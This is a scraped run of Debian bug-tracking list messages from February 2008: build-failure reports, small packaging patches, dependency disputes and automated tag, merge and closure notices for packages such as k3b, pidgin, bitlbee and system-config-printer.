> >   Unfortunately, not. I checked again, specifically including the awt
> > library in the classpath (at run-time, does not seem to work at
> > build-time), and I still get a garbled output. Are you using an amd64
> > architecture ? Could that be a 64bits-only problem ?
> 
> I tried to reproduce on i386 when it worked. I re-tried on amd64 and now
> I can reproduce the bug report.

I forwarded that bug to the upstream bugzilla now.


Cheers,
Michael



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: Patch for #461023

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> Tag 461023 + patch
Bug#461023: system-config-printer: FTBFS: Error on file "print-applet.desktop": 
Failed to validate the created desktop file
There were no tags set.
Tags added: patch

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: Patch for #457702

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> Tag 457702 + patch
Bug#457702: system-config-printer: missing dependency on python-cups (>= 1.9.27)
There were no tags set.
Tags added: patch

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#461023: Patch for #461023

2008-02-11 Thread Patrick Schoenfeld
Tag 461023 + patch
thanks

Hi,

please find an patch attached.

If you want I can prepare an upload for you. Please let me know, then.
If I don't hear anything from you (and don't see this bug fixed :-) I
will prepare an upload as well.

Best Regards,
Patrick
--- system-config-printer-0.7.78/print-applet.desktop.in	2007-12-15 21:55:04.0 +0100
+++ system-config-printer-0.7.78.patched/print-applet.desktop.in	2008-02-11 21:15:27.522792548 +0100
@@ -5,6 +5,6 @@
 Exec=/usr/bin/system-config-printer-applet
 Terminal=false
 Type=Application
-Icon=printer.png
+Icon=printer
 X-KDE-autostart-after=panel
 StartupNotify=false


Bug#457702: Patch for #457702

2008-02-11 Thread Patrick Schoenfeld
Tag 457702 + patch
thanks

Hi,

please find a patch attached.

If you want I can prepare an upload for you. Please let me know, then.
If I don't hear anything from you (and don't see this bug fixed :-) I
will prepare an upload as well.

Best Regards,
Patrick
--- system-config-printer-0.7.78/debian/control	2008-02-11 21:19:32.0 +0100
+++ system-config-printer-0.7.78.patched/debian/control	2008-02-11 21:12:12.099656019 +0100
@@ -15,7 +15,7 @@
 Architecture: all
 Depends: ${shlibs:Depends},
 		 ${python:Depends},
-		 python-cups,
+		 python-cups (>= 1.9.27),
 		 python-gtk2,
 		 python-glade2,
 		 python-xml


Bug#465177: FTBFS: configure: error: unable to configure inotify support

2008-02-11 Thread Sergey Jin' Bostandzhyan
On Mon, Feb 11, 2008 at 01:41:03PM -0500, Andres Mejia wrote:
> > do not pass the --enable-inotify parameter to the configure script;
> > presence of inotify will be detected automatically, if not available it
> > will be disabled on the fly. However, when the --enable-inotify parameter
> > is passed by the user, configure will abort with the error that you are
> > seeing if inotify checks fail.
> 
> This is done on purpose so that no package on a different architecture/kernel 
> builds packages sucessfully with a different set of options enabled, else I'm 
> sure there would be a different set of bugs sooner or later. The inotify 
> option is not enabled for any non-linux kernel using machine.
> 
> The parameters passed to the configure script can be manually overridden by a 
> user, but they won't be for the buildd machines.

Well, if you are sure that the target machines *do have inotify support*
the only thing that could help is the config.log output of the failed 
configure process.

> > What I still need to do is, to adapt the inotify check for cross compiling,
> > right now it will always fail when cross compiled.
> 
> Actually, no cross compiling is done. The powerpc buildd machine is a powerpc 
> machine. The same goes for the other buildd machines.

Then it should work; we do check the headers and then we run some small test
code which is calling inotify_init(). If the inotify_init() function returns 
-1 (error) we will compile without inotify support; however - if 
the --enable-inotify parameter was specified configure will abort because it 
can not do what the user wanted.

So the question: is inotify really working on those systems?

Kind regards,
Jin




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465095: mailscanner fails to start with FIELD_NAME not imported

2008-02-11 Thread Simon Walter

Hello Lukas,

did you update an old mailscanner installation?

--
Regards
Simon Walter

Lukas Ruf <[EMAIL PROTECTED]> writes:

> Package: mailscanner
> Version: 4.58.9-2
> Severity: grave
> Justification: renders package unusable
>
>
> The following error is reported when I attempt to start mailscanner:
>
> Starting mail spam/virus scanner: MailScannerVariable "$FIELD_NAME" is not 
> imported at /usr/share/MailScanner/MailScanner/Message.pm line 6367.
> Variable "$FIELD_NAME" is not imported at 
> /usr/share/MailScanner/MailScanner/Message.pm line 6370.
> Global symbol "$FIELD_NAME" requires explicit package name at 
> /usr/share/MailScanner/MailScanner/Message.pm line 6367.
> Global symbol "$FIELD_NAME" requires explicit package name at 
> /usr/share/MailScanner/MailScanner/Message.pm line 6370.
> Compilation failed in require at /usr/sbin/MailScanner line 79.
> BEGIN failed--compilation aborted at /usr/sbin/MailScanner line 79.
>  failed!
> invoke-rc.d: initscript mailscanner, action "start" failed.
>
> Does anybody know how to resolve this problem?
>
> Is it related to the following debconf setting?
>   mailscanner/v3_upgrade: Don't upgrade
> If so, how can I change that?
>
> Thanks for any support
>
> Kind regards,
> Lukas
>
>
> -- System Information:
> Debian Release: lenny/sid
>   APT prefers unstable
>   APT policy: (500, 'unstable')
> Architecture: i386 (i686)
>
> Kernel: Linux 2.6.23.9-euphrat (SMP w/2 CPU cores; PREEMPT)
> Locale: LANG=en_IE, LC_CTYPE=en_IE (charmap=ISO-8859-1)
> Shell: /bin/sh linked to /bin/bash
>
> Versions of packages mailscanner depends on:
> ii  debconf [debconf-2.0]   1.5.19   Debian configuration management 
> sy
> ii  libarchive-zip-perl 1.18-1   Module for manipulation of ZIP 
> arc
> ii  libcompress-zlib-perl   2.008-1  Perl module for creation and 
> manip
> ii  libconvert-binhex-perl  1.119+pristine-2 Perl5 module for extracting data 
> f
> ii  libconvert-tnef-perl0.17-5   Perl module to read TNEF files
> ii  libdbd-sqlite3-perl 1.14-1   Perl DBI driver with a 
> self-contai
> ii  libfilesys-df-perl  0.92-3   Module to obtain filesystem disk 
> s
> ii  libhtml-parser-perl 3.56-1   A collection of modules that 
> parse
> ii  libmime-perl5.425-2  transitional dummy package
> ii  libmime-tools-perl [lib 5.425-2  Perl5 modules for MIME-compliant 
> m
> ii  libnet-cidr-perl0.11-2   Manipulate IPv4/IPv6 netblocks in
> ii  libsys-hostname-long-pe 1.4-1Figure out the long 
> (fully-qualifi
> ii  libsys-syslog-perl  0.24-1   Perl interface to the UNIX 
> syslog(
> ii  perl5.8.8-12 Larry Wall's Practical Extraction
> ii  postfix [mail-transport 2.5.1~rc1-1  High-performance mail transport 
> ag
> ii  spamassassin3.2.3-1  Perl-based spam filter using text
> ii  ucf 3.004Update Configuration File: 
> preserv
> ii  unzip   5.52-10  De-archiver for .zip files
>
> Versions of packages mailscanner recommends:
> pn  libnet-cidr-lite-perl  (no description available)
> ii  ncftp 2:3.2.1-1  A user-friendly and well-featured
> ii  tnef  1.4.3-2Tool to unpack MIME 
> application/ms
> ii  wget  1.10.2-3   retrieves files from the web
>
> -- debconf information:
>   mailscanner/v3_upgrade: Don't upgrade
>
>
>



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#459281: Still present with recent gcj

2008-02-11 Thread Michael Koch
On Mon, Feb 11, 2008 at 07:42:41PM +0100, Vincent Fourmond wrote:
> 
>   Hello,
> 
> Michael Koch wrote:
> > On Mon, Feb 04, 2008 at 10:19:26AM +0100, Vincent Fourmond wrote:
> >>   For information, libjfreechart-java still does not work with gcj
> >> 4.3-20080202-1.
> > 
> > I have tested 4.3-20080116-1 and 4.3-20080202-1 locally and both worked.
> > The generated image is slightly different to the one generated by SUN
> > but that was to be expected.
> >
> > I wonder if you missed the libgcj9-0-awt package in your installation?
> 
>   Unfortunately, not. I checked again, specifically including the awt
> library in the classpath (at run-time, does not seem to work at
> build-time), and I still get a garbled output. Are you using an amd64
> architecture ? Could that be a 64bits-only problem ?

I tried to reproduce on i386 when it worked. I re-tried on amd64 and now
I can reproduce the bug report.


Cheers,
Michael



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465312: marked as done (ipw3945-modules-2.6-686 depends on linux-latest-modules-2.6.22-3-686 not available in repositories)

2008-02-11 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 20:57:32 +0100
with message-id <[EMAIL PROTECTED]>
and subject line Re: Bug#465312: ipw3945-modules-2.6-686 depends on 
linux-latest-modules-2.6.22-3-686 not available in repositories
has caused the Debian Bug report #465312,
regarding ipw3945-modules-2.6-686 depends on linux-latest-modules-2.6.22-3-686 
not available in repositories
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465312: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465312
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: ipw3945-modules-2.6-686
Version: 2:2.6.22-4
Severity: grave
Justification: renders package unusable

*** Please type your report below this line ***

The package ipw3945-modules-2.6-686 depends on
linux-latest-modules-2.6.22-3-686 but this last one is not available with
the linux-image-2.6-686 for kernel 2.6.24. With the upgrade to kernel
2.6.24ipw3945 has been automatically uninstalled and is no longer
installable.
iwl3945 replacement driver isn't nearly as good as ipw3945, so it would
be good to made ipw3945 available for kernel 2.6.24.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-686 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages ipw3945-modules-2.6-686 depends on:
ii  ipw3945-modules-2.6.22-3- 2.6.22+1.2.2-4 Intel Wireless 3945 modules for
Li
ii  linux-image-2.6-686 [linu 2.6.22+11  Linux 2.6 image on
PPro/Celeron/PI

ipw3945-modules-2.6-686 recommends no packages.

-- no debconf information

-- 
Apelete Seketeli <[EMAIL PROTECTED]>
--- End Message ---
--- Begin Message ---
On Mon, Feb 11, 2008 at 08:29:38PM +0100, Apelete Seketeli wrote:
> Package: ipw3945-modules-2.6-686
> Version: 2:2.6.22-4
> Severity: grave
> Justification: renders package unusable
> 
> *** Please type your report below this line ***
> 
> The package ipw3945-modules-2.6-686 depends on
> linux-latest-modules-2.6.22-3-686 but this last one is not available with
> the linux-image-2.6-686 for kernel 2.6.24. With the upgrade to kernel
> 2.6.24ipw3945 has been automatically uninstalled and is no longer
> installable.
> iwl3945 replacement driver isn't nearly as good as ipw3945, so it would
> be good to made ipw3945 available for kernel 2.6.24.

how about you do a *little* research before doing *big* fingerpointing.
iwlwifi is merged and operational, see
http://wiki.debian.org/iwlwifi

closing

--- End Message ---


Bug#465044: marked as done (the whole system freezes when clicking on a link in pidgin)

2008-02-11 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 15:03:18 -0500 (EST)
with message-id <[EMAIL PROTECTED]>
and subject line Re: Bug#465044: the whole system freezes when clicking on a 
link  in pidgin
has caused the Debian Bug report #465044,
regarding the whole system freezes when clicking on a link in pidgin
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465044: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465044
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: pidgin
Version: 2.3.1-2
Severity: critical
Justification: breaks the whole system

When in a Chat Window clicking on a link sent from a user the whole
system crashes

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (991, 'testing'), (500, 'gutsy'), (500, 'unstable'), (499, 
'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-2-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages pidgin depends on:
ii  gconf2  2.20.1-2+b1  GNOME configuration database syste
ii  libatk1.0-0 1.20.0-1 The ATK accessibility toolkit
ii  libc6   2.7-6GNU C Library: Shared libraries
ii  libcairo2   1.4.14-1 The Cairo 2D vector graphics libra
ii  libdbus-1-3 1.1.2-1  simple interprocess messaging syst
ii  libdbus-glib-1-20.74-1   simple interprocess messaging syst
ii  libglib2.0-02.14.5-2 The GLib library of C routines
ii  libgstreamer0.10-0  0.10.15-4Core GStreamer libraries and eleme
ii  libgtk2.0-0 2.12.5-2 The GTK+ graphical user interface 
ii  libgtkspell02.0.10-4 a spell-checking addon for GTK's T
ii  libice6 2:1.0.4-1X11 Inter-Client Exchange library
ii  libpango1.0-0   1.18.4-1 Layout and rendering of internatio
ii  libpurple0  2.3.1-2  multi-protocol instant messaging l
ii  libsm6  2:1.0.3-1+b1 X11 Session Management library
ii  libstartup-notification00.9-1library for program launch feedbac
ii  libx11-62:1.0.3-7X11 client-side library
ii  libxss1 1:1.1.2-1X11 Screen Saver extension library
ii  pidgin-data 2.3.1-2  multi-protocol instant messaging c

Versions of packages pidgin recommends:
ii  gstreamer0.10-plugins-base0.10.15-4  GStreamer plugins from the "base" 
ii  gstreamer0.10-plugins-good0.10.6-4   GStreamer plugins from the "good" 

-- no debconf information


--- End Message ---
--- Begin Message ---
I cannot get my system to freeze by setting pidgin's browser as links2; it
will just fork it in the background and continue running as normal. This
seems to be some sort of misconfiguration on the user's machine.


--- End Message ---


Processed: Merge bugs

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> severity 465311 serious
Bug#465311: k3b: fails with symbol lookup error
Severity set to `serious' from `grave'

> reassign 465311 libqt3-mt
Bug#465311: k3b: fails with symbol lookup error
Bug reassigned from package `k3b' to `libqt3-mt'.

> merge 465311 464946
Bug#464946: K3b crashes because of library problem
Bug#465311: k3b: fails with symbol lookup error
Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions
Bug#465029: virtualbox-ose: undefined symbol: stat64
Bug#465046: symbol lookup error
Bug#465125: kcm_fonts.so: undefined symbol: lstat64
Bug#465151: virtualbox command raised undefined symbol: stat64
Bug#465239: virtualbox fails to start with "symbol lookup error: 
/usr/lib/virtualbox/VirtualBox: undefined symbol: stat64"
Merged 464946 465028 465029 465046 465125 465151 465239 465311.

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465055: php-ps: FTBFS: libgd2-dev not available anymore.

2008-02-11 Thread Luk Claes
Uwe Steinmann wrote:
> On Sun, Feb 10, 2008 at 01:32:40PM +0100, Kurt Roeckx wrote:

>> You have a build dependency on:
>> libgd2-dev (>> 2.0.0) | libgd2-xpm-dev (>> 2.0.0) | libgd2-noxpm-dev (>> 
>> 2.0.0)
>>
>> The buildd's will only consider the first of those, and then fail.
>> You'll want to remove that part.
> Is this specific for the buildds or the above dependency line
> in general the wrong approach?

I would say both. The reason buildds don't parse the alternative build
dependencies is because the build has to be reproducible over time. If
you want builds that are reproducible over time, alternative build
dependencies don't make sense at all as that would mean it depends on
the environment at the time of the build what the outcome of the actual
build dependency is...

Cheers

Luk



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#458717: marked as done (bitlbee: FTBFS if $(DEB_BUILD_OPTIONS) contains stuff)

2008-02-11 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 19:32:02 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#458717: fixed in bitlbee 1.0.4-2
has caused the Debian Bug report #458717,
regarding bitlbee: FTBFS if $(DEB_BUILD_OPTIONS) contains stuff
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
458717: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=458717
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: bitlbee
version: 1.0.4-1
Severity: serious
User: [EMAIL PROTECTED]
Usertags: qa-ftbfs-20080101 qa-ftbfs
Justification: FTBFS on i386

Hi,

During a rebuild of all packages in sid, your package failed to build on i386.

Relevant part:

 > make[1]: Entering directory `/build/user/bitlbee-1.0.4'
 > 
 > Run ./configure to create Makefile.settings, then rerun make
 > 
 > mkdir -p /build/user/bitlbee-1.0.4/debian/bitlbee
 > install -m 0755  /build/user/bitlbee-1.0.4/debian/bitlbee/
 > install: missing destination file operand after 
 > `/build/user/bitlbee-1.0.4/debian/bitlbee/'
 > Try `install --help' for more information.
 > make[1]: *** [install-bin] Error 1
 > make[1]: Leaving directory `/build/user/bitlbee-1.0.4'
 > make: *** [install-arch] Error 2
 > dpkg-buildpackage: failure: /usr/bin/fakeroot debian/rules binary gave error 
 > exit status 2

The full build log is available from:
http://people.debian.org/~lucas/logs/2008/01/01

A list of current common problems and possible solutions is available at 
http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!

About the archive rebuild: The rebuild was done on about 50 AMD64 nodes
of the Grid'5000 platform, using a clean chroot containing a sid i386
environment.  Internet was not accessible from the build systems.

-- 
| Lucas Nussbaum
| [EMAIL PROTECTED]   http://www.lucas-nussbaum.net/ |
| jabber: [EMAIL PROTECTED] GPG: 1024D/023B3F4F |


--- End Message ---
--- Begin Message ---
Source: bitlbee
Source-Version: 1.0.4-2

We believe that the bug you reported is fixed in the latest version of
bitlbee, which is due to be installed in the Debian FTP archive:

bitlbee_1.0.4-2.diff.gz
  to pool/main/b/bitlbee/bitlbee_1.0.4-2.diff.gz
bitlbee_1.0.4-2.dsc
  to pool/main/b/bitlbee/bitlbee_1.0.4-2.dsc
bitlbee_1.0.4-2_amd64.deb
  to pool/main/b/bitlbee/bitlbee_1.0.4-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Wilmer van der Gaast <[EMAIL PROTECTED]> (supplier of updated bitlbee package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Mon, 11 Feb 2008 19:15:33 +
Source: bitlbee
Binary: bitlbee
Architecture: source amd64
Version: 1.0.4-2
Distribution: unstable
Urgency: low
Maintainer: Wilmer van der Gaast <[EMAIL PROTECTED]>
Changed-By: Wilmer van der Gaast <[EMAIL PROTECTED]>
Description: 
 bitlbee- An IRC to other chat networks gateway
Closes: 458717
Changes: 
 bitlbee (1.0.4-2) unstable; urgency=low
 .
   * Removed $DEB_BUILD_OPTIONS because apparently buildds fill it with crap.
 (Closes: #458717)
Files: 
 3a2fe79c13928905364f36f85fb1c71a 649 net optional bitlbee_1.0.4-2.dsc
 684371b17b16932aabc1577a7b8f57dd 27758 net optional bitlbee_1.0.4-2.diff.gz
 16e80e2a4084fd11e8c1b98e9320c6b0 332024 net optional bitlbee_1.0.4-2_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHsJ9SeYWXmuMwQFERAiMYAJ96nHIgB1PzwMIRmQQ5i3PNW49fMwCeOHkh
VGqgjeL0sGM1u50X4EbR0OU=
=9jHS
-END PGP SIGNATURE-


--- End Message ---


Processed: severity of 446343 is important

2008-02-11 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.14
> # unreproducible
> severity 446343 important
Bug#446343: cutter: does not work at all
Severity set to `important' from `grave'

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#446343: severity of 446343 is important

2008-02-11 Thread Luk Claes
# Automatically generated email from bts, devscripts version 2.10.14
# unreproducible
severity 446343 important




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#445254: marked as done (gdesklets: fails to start due to wrong pyorbit version)

2008-02-11 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 19:32:04 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#445254: fixed in gdesklets 0.35.4-1
has caused the Debian Bug report #445254,
regarding gdesklets: fails to start due to wrong pyorbit version
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
445254: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=445254
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: gdesklets
Version: 0.35.3-4+b1
Severity: grave
Justification: renders package unusable

This is what happens when I try to start gdesklets:

[EMAIL PROTECTED]:~$ gdesklets

gDesklets wurde das erste Mal gestartet.
Eine Überprüfung der Abhängigkeiten wird jetzt durchgeführt...

Überprüfung der Abhängigkeiten: (= dependencies check)
 - sys ... gefunden
 - xml.parsers.expat ... gefunden
 - xml.sax ... gefunden
 - gtk ... gefunden
 - ORBit ... gefunden
Versionsüberprüfung fehlgeschlagen. (= version check failed)

ORBit-Python-Anbindungen (pyorbit) Version == 2.0.1 werden benötigt.
  ^

Obviously, gdesklets require a specific version of python orbit
bindings, however, the gdesklets package does not have any dependency on
python-pyorbit.

Thanks,

Johannes


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (101, 
'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-2-k7 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages gdesklets depends on:
ii  libart-2.0-2   2.3.19-3  Library of functions for 2D graphi
ii  libatk1.0-01.20.0-1  The ATK accessibility toolkit
ii  libbonobo2-0   2.20.0-1  Bonobo CORBA interfaces library
ii  libbonoboui2-0 2.20.0-1  The Bonobo UI library
ii  libc6  2.6.1-5   GNU C Library: Shared libraries
ii  libcairo2  1.4.10-1  The Cairo 2D vector graphics libra
ii  libfontconfig1 2.4.2-1.2 generic font configuration library
ii  libgconf2-42.20.0-1  GNOME configuration database syste
ii  libglib2.0-0   2.14.1-4  The GLib library of C routines
ii  libgnome-keyring0  2.20.0-2  GNOME keyring services library
ii  libgnome2-02.20.0-1  The GNOME 2 library - runtime file
ii  libgnomecanvas2-0  2.20.0-1  A powerful object-oriented display
ii  libgnomeui-0   2.20.0-1  The GNOME 2 libraries (User Interf
ii  libgnomevfs2-0 1:2.20.0-1GNOME Virtual File System (runtime
ii  libgtk2.0-02.12.0-2  The GTK+ graphical user interface 
ii  libgtop2-7 2.20.0-1  gtop system monitoring library
ii  libice62:1.0.4-1 X11 Inter-Client Exchange library
ii  liborbit2  1:2.14.7-0.1  libraries for ORBit2 - a CORBA ORB
ii  libpango1.0-0  1.18.2-1  Layout and rendering of internatio
ii  libpopt0   1.10-3lib for parsing cmdline parameters
ii  librsvg2-2 2.18.2-1  SAX-based renderer library for SVG
ii  libsm6 2:1.0.3-1+b1  X11 Session Management library
ii  libx11-6   2:1.0.3-7 X11 client-side library
ii  libxcursor11:1.1.9-1 X cursor management library
ii  libxext6   1:1.0.3-2 X11 miscellaneous extension librar
ii  libxfixes3 1:4.0.3-2 X11 miscellaneous 'fixes' extensio
ii  libxi6 2:1.1.3-1 X11 Input extension library
ii  libxinerama1   1:1.0.2-1 X11 Xinerama extension library
ii  libxml22.6.30.dfsg-2 GNOME XML library
ii  libxrandr2 2:1.2.2-1 X11 RandR extension library
ii  libxrender11:0.9.4-1 X Rendering Extension client libra
ii  python 2.4.4-6   An interactive high-level object-o
ii  python-gnome2  2.20.0-1  Python bindings for the GNOME desk
ii  python-gtk22.12.0-1  Python bindings for the GTK+ widge
ii  python-numeric 24.2-8Numerical (matrix-oriented) Mathem
ii  python-xml 0.8.4-8   XML tools for Python

Versions of packages gdesklets recommends:
pn  gdesklets-data (no description available)

-- no debconf information


--- End Message ---
--- Begin Message ---
Source: gdesklet

Bug#465312: ipw3945-modules-2.6-686 depends on linux-latest-modules-2.6.22-3-686 not available in repositories

2008-02-11 Thread Apelete Seketeli
Package: ipw3945-modules-2.6-686
Version: 2:2.6.22-4
Severity: grave
Justification: renders package unusable

*** Please type your report below this line ***

The package ipw3945-modules-2.6-686 depends on
linux-latest-modules-2.6.22-3-686 but this last one is not available with
the linux-image-2.6-686 for kernel 2.6.24. With the upgrade to kernel
2.6.24ipw3945 has been automatically uninstalled and is no longer
installable.
iwl3945 replacement driver isn't nearly as good as ipw3945, so it would
be good to made ipw3945 available for kernel 2.6.24.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-686 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages ipw3945-modules-2.6-686 depends on:
ii  ipw3945-modules-2.6.22-3- 2.6.22+1.2.2-4 Intel Wireless 3945 modules for
Li
ii  linux-image-2.6-686 [linu 2.6.22+11  Linux 2.6 image on
PPro/Celeron/PI

ipw3945-modules-2.6-686 recommends no packages.

-- no debconf information

-- 
Apelete Seketeli <[EMAIL PROTECTED]>


Bug#465311: k3b: fails with symbol lookup error

2008-02-11 Thread Roman S Dubtsov
Package: k3b
Version: 1.0.4-6
Severity: grave
Justification: renders package unusable

K3b sporadically fails with the following message (current guess is that
it crashed when reading the media):

k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: stat64

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.24-toi-rc5 (SMP w/1 CPU core)
Locale: LANG=ru_RU.UTF-8, LC_CTYPE=ru_RU.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages k3b depends on:
ii  cdparanoia   3.10+debian~pre0-6  audio extraction tool for sampling
ii  cdrdao   1:1.2.2-11  records CDs in Disk-At-Once (DAO) 
ii  genisoimage  9:1.1.6-1   Creates ISO-9660 CD-ROM filesystem
ii  k3b-data 1.0.4-6 A sophisticated KDE CD burning app
ii  kdelibs-data 4:3.5.8.dfsg.1-7core shared data for all KDE appli
ii  kdelibs4c2a  4:3.5.8.dfsg.1-7core libraries and binaries for al
ii  libacl1  2.2.45-1Access control list shared library
ii  libart-2.0-2 2.3.20-1Library of functions for 2D graphi
ii  libattr1 1:2.4.39-1  Extended attribute shared library
ii  libaudio21.9.1-1 Network Audio System - shared libr
ii  libc62.7-6   GNU C Library: Shared libraries
ii  libdbus-1-3  1.1.2-1 simple interprocess messaging syst
ii  libdbus-qt-1-1c2 0.62.git.20060814-2 simple interprocess messaging syst
ii  libdvdread3  0.9.7-6 library for reading DVDs
ii  libexpat11.95.8-4XML parsing C library - runtime li
ii  libfam0  2.7.0-13.1  Client library to control the FAM 
ii  libfontconfig1   2.5.0-2 generic font configuration library
ii  libfreetype6 2.3.5-1+b1  FreeType 2 font engine, shared lib
ii  libgcc1  1:4.3-20080202-1GCC support library
ii  libhal1  0.5.10-5Hardware Abstraction Layer - share
ii  libice6  2:1.0.4-1   X11 Inter-Client Exchange library
ii  libidn11 1.4-1   GNU libidn library, implementation
ii  libjpeg626b-14   The Independent JPEG Group's JPEG 
ii  libk3b3  1.0.4-6 The KDE cd burning application lib
ii  libmusicbrainz4c2a   2.1.5-1 Second generation incarnation of t
ii  libpng12-0   1.2.15~beta5-3  PNG library - runtime
ii  libqt3-mt3:3.3.8b-1  Qt GUI Library (Threaded runtime v
ii  libsm6   2:1.0.3-1+b1X11 Session Management library
ii  libstdc++6   4.3-20080202-1  The GNU Standard C++ Library v3
ii  libx11-6 2:1.1.1-1   X11 client-side library
ii  libxcursor1  1:1.1.9-1   X cursor management library
ii  libxext6 1:1.0.3-2   X11 miscellaneous extension librar
ii  libxft2  2.1.12-2FreeType-based font drawing librar
ii  libxi6   2:1.1.3-1   X11 Input extension library
ii  libxinerama1 1:1.0.2-1   X11 Xinerama extension library
ii  libxrandr2   2:1.2.2-1   X11 RandR extension library
ii  libxrender1  1:0.9.4-1   X Rendering Extension client libra
